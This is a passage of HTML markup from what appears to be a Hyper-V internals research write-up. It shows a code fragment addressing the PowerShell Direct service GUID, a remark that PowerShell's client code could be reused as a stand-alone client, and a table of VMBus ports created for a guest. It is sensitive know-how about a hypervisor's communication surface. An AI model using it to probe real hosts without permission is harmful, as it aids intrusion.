<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{999e53d4-3d5c-4c3e-8779-bed06ec056e1}"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &ServiceID); </span><span style="background-color: transparent; color: green; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//GUID of Powershell Direct Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's compile and start the application; we then receive an answer from the guest OS:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="63" src="https://lh3.googleusercontent.com/oDUWbY2UN2mME67WUn0LKuKBaySI8gpuhS0Z0BItcff0FlP9rRg02Rdgb_S_fbJctyfGpbmQOCUlkOcTpdml9TnqImxLF5z0PA_lNrzNESFtwYgA2yL2LMeM9wpR6JWEk_n-iiKNawfIkYQi8w" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="177" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We see how the icsvc.dll module begins interaction with the client. The client part of the protocol is present in the PowerShell source code in OutOfProcTransportManager.cs and RemoteSessionHyperVSocket.cs, so technically nothing prevents copying this code into a stand-alone program and using it as a full client for communicating with the PowerShell Direct service without any additional privileges. Of course, the credentials under which the powershell.exe process will be started in the guest OS will still need to be specified.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The table below lists the ports created by the root OS for communication with the guest OS. Two additional ports are created for PowerShell Direct.</span></div>
<br /><div dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="36"></col><col width="301"></col><col width="81"></col><col width="54"></col><col width="120"></col><col width="50"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">№</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Call stack (or calling function)</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Created Ports (r8)</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PortID</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Type</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SINTx</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentCreateParentMessagePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartCreateVidPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusvdev!VmbusVdev::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeMessage</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentCreateChildMessagePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartCreateVidPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusvdev!VmbusVdev::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">21</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeMessage</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentCreateChildEventPort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartCreateVidPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusvdev!VmbusVdev::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmdynmem!DynMemDevice::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">d</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10001</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmuidevices!SynthRdpDevice::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">e</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10002</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="6" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmuidevices!SynthMouseDevice::PowerOn</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10003</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="7" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmuidevices!SynthKeyboardDevice::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10004</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
